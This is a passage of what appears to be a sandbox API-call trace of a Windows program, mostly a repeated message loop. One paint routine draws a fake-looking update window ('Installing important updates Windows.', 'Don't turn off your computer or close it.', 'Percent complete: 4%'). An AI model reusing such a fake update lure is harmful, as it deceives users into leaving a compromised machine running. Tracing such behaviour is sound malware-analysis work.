[0053.702] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.759] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.759] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.759] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.759] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.759] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.759] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.759] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.760] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.795] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.795] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.795] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.795] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.795] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.795] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.795] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.796] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.841] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.842] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.842] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.842] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.842] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.842] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.842] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.843] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.888] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.888] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.888] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.888] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.888] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.889] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.889] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.889] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0053.935] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0053.935] TranslateMessage (lpMsg=0x18e548) returned 0 [0053.935] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0053.935] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0054.911] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0054.911] TranslateMessage (lpMsg=0x18e548) returned 0 [0054.911] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0054.912] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0054.949] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0054.949] TranslateMessage (lpMsg=0x18e548) returned 0 [0054.949] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0054.949] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0054.949] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0054.949] TranslateMessage (lpMsg=0x18e548) returned 0 [0054.949] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0054.950] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0054.996] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0054.996] TranslateMessage (lpMsg=0x18e548) returned 0 [0054.996] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0054.996] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0054.996] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0054.996] TranslateMessage (lpMsg=0x18e548) returned 0 [0054.996] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0054.997] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.043] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.043] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.043] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.043] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.043] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.043] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.043] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.044] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.090] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.090] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.090] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.090] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.090] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.090] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.090] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.091] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.136] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.136] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.136] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.136] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.136] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.136] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.136] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.137] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.183] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.183] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.183] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.183] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.183] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.183] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.183] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.184] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.230] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.230] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.230] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.230] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.230] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.230] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.230] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.231] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.277] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.277] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.277] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.277] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.277] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.277] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.277] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.278] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.324] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.324] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.324] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.324] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.324] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.324] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.324] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.325] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.370] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.370] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.371] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.371] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.371] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.371] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.371] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.371] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.417] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.417] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.417] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.417] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.417] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.417] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.417] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.419] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.464] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.464] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.464] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.464] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.464] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.464] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.464] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.465] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0055.511] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0055.511] TranslateMessage (lpMsg=0x18e548) returned 0 [0055.511] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0055.511] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.703] TranslateAcceleratorW (hWnd=0xf011c, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.703] TranslateMessage (lpMsg=0x18e548) returned 1 [0056.704] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.704] NtdllDefWindowProc_W () returned 0x0 [0056.704] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.704] TranslateAcceleratorW (hWnd=0xf011c, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.704] TranslateMessage (lpMsg=0x18e548) returned 1 [0056.704] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.704] NtdllDefWindowProc_W () returned 0x0 [0056.704] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.704] TranslateAcceleratorW (hWnd=0xf011c, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.704] TranslateMessage (lpMsg=0x18e548) returned 1 [0056.704] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.704] NtdllDefWindowProc_W () returned 0x0 [0056.704] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.704] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.704] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.704] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.704] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.712] NtdllDefWindowProc_W () returned 0x1 [0056.714] NtdllDefWindowProc_W () returned 0x0 [0056.714] NtdllDefWindowProc_W () returned 0x0 [0056.714] NtdllDefWindowProc_W () returned 0x0 [0056.714] NtdllDefWindowProc_W () returned 0x0 [0056.715] NtdllDefWindowProc_W () returned 0x0 [0056.715] TranslateAcceleratorW (hWnd=0xf011c, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.715] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.715] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.715] BeginPaint (in: hWnd=0xf011c, lpPaint=0x18e2e0 | out: lpPaint=0x18e2e0) returned 0x1001083d [0056.715] NtdllDefWindowProc_W () returned 0x0 [0056.716] NtdllDefWindowProc_W () returned 0x1 [0056.716] EndPaint (hWnd=0xf011c, lpPaint=0x18e2e0) returned 1 [0056.716] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.716] TranslateAcceleratorW (hWnd=0x401ae, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.716] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.716] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.716] BeginPaint (in: hWnd=0x401ae, lpPaint=0x18d9c8 | out: lpPaint=0x18d9c8) returned 0x1001083d [0056.717] CreateSolidBrush (color=0x5b3ef) returned 0x20100250 [0056.717] FillRect (hDC=0x1001083d, lprc=0x18d9b8, hbr=0x20100250) returned 1 [0056.717] DeleteObject (ho=0x20100250) returned 1 [0056.717] DrawIcon (hDC=0x1001083d, X=7, Y=7, hIcon=0x601c5) returned 1 [0056.717] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x7c0a0821 [0056.717] SelectObject (hdc=0x1001083d, h=0x7c0a0821) returned 0x18a002e [0056.717] SetBkMode (hdc=0x1001083d, mode=1) returned 2 [0056.717] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0056.717] TextOutW (hdc=0x1001083d, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0056.717] SelectObject (hdc=0x1001083d, h=0x18a002e) returned 0x7c0a0821 [0056.717] CreateSolidBrush (color=0xffffff) returned 0x21100250 [0056.717] FillRect (hDC=0x1001083d, lprc=0x18d9a8, hbr=0x21100250) returned 1 [0056.717] DeleteObject (ho=0x21100250) returned 1 [0056.717] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x1c0a0843 [0056.717] SelectObject (hdc=0x1001083d, h=0x1c0a0843) returned 0x18a002e [0056.717] SetBkMode (hdc=0x1001083d, mode=1) returned 1 [0056.718] lstrlenW (lpString="Getting your update ready.") returned 26 [0056.718] TextOutW (hdc=0x1001083d, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0056.718] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0056.718] TextOutW (hdc=0x1001083d, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0056.718] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0056.718] TextOutW (hdc=0x1001083d, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0056.718] SelectObject (hdc=0x1001083d, h=0x18a002e) returned 0x1c0a0843 [0056.718] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x170a0841 [0056.718] SelectObject (hdc=0x1001083d, h=0x170a0841) returned 0x18a002e [0056.718] SetBkMode (hdc=0x1001083d, mode=1) returned 1 [0056.718] SetTextAlign (hdc=0x1001083d, align=0x6) returned 0x0 [0056.718] wsprintfW (in: param_1=0x18da08, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0056.718] lstrlenW (lpString="Percent complete: 4%") returned 20 [0056.718] TextOutW (hdc=0x1001083d, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0056.718] SelectObject (hdc=0x1001083d, h=0x18a002e) returned 0x170a0841 [0056.718] EndPaint (hWnd=0x401ae, lpPaint=0x18d9c8) returned 1 [0056.719] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.719] TranslateAcceleratorW (hWnd=0x301aa, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.719] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.719] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.723] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.723] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.723] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.723] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.724] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.748] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.748] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.748] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.748] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.748] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.748] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.748] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.749] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.795] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.795] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.795] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.795] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0056.795] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0056.795] TranslateMessage (lpMsg=0x18e548) returned 0 [0056.795] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0056.796] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0058.302] TranslateAcceleratorW (hWnd=0x301b0, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0058.302] TranslateMessage (lpMsg=0x18e548) returned 0 [0058.302] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0058.302] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0058.302] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0058.302] TranslateMessage (lpMsg=0x18e548) returned 0 [0058.302] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0058.302] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0058.302] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0058.302] TranslateMessage (lpMsg=0x18e548) returned 0 [0058.302] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0058.320] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0058.320] TranslateAcceleratorW (hWnd=0x40122, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0058.320] TranslateMessage (lpMsg=0x18e548) returned 0 [0058.320] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0058.320] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0058.320] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0058.320] TranslateMessage (lpMsg=0x18e548) returned 0 [0058.337] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0058.337] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0058.337] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0058.337] TranslateMessage (lpMsg=0x18e548) returned 0 [0058.337] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0058.338] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0059.432] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0059.433] TranslateMessage (lpMsg=0x18e548) returned 0 [0059.434] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0059.434] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0059.434] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0059.434] TranslateMessage (lpMsg=0x18e548) returned 0 [0059.434] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0059.435] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0059.511] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0059.511] TranslateMessage (lpMsg=0x18e548) returned 0 [0059.511] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0059.511] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0059.511] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0059.511] TranslateMessage (lpMsg=0x18e548) returned 0 [0059.511] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0059.512] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0059.702] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0059.726] TranslateMessage (lpMsg=0x18e548) returned 0 [0059.726] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0059.752] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0059.752] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0059.752] TranslateMessage (lpMsg=0x18e548) returned 0 [0059.752] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0060.266] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0060.266] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0060.266] TranslateMessage (lpMsg=0x18e548) returned 0 [0060.266] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0060.266] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0060.266] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0060.266] TranslateMessage (lpMsg=0x18e548) returned 0 [0060.266] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0060.267] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0060.699] TranslateAcceleratorW (hWnd=0x301b2, hAccTable=0x9016b, lpMsg=0x18e548) returned 0 [0060.699] TranslateMessage (lpMsg=0x18e548) returned 0 [0060.699] DispatchMessageW (lpMsg=0x18e548) returned 